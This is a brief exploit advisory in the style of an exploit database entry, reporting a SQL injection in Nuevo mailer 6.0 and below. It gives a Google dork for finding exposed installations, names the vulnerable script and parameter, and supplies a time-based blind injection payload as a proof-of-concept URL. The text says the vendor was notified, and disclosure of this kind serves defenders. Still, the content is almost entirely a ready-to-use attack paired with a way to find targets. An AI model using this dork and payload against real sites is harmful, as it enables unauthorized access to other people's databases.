# Exploit Title: Nuevo mailer version <= 6.0 SQL Injection # Exploit Author: ALEH BOITSAU # Google Dork: inurl:/inc/rdr.php? # Date: 2017-06-09 # Vendor Homepage: https://www.nuevomailer.com/ # Version: 6.0 and below # Tested on: Linux Vulnerable script: rdr.php Vulnerable parameter: r PoC: https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+ NB: vendor has been notified.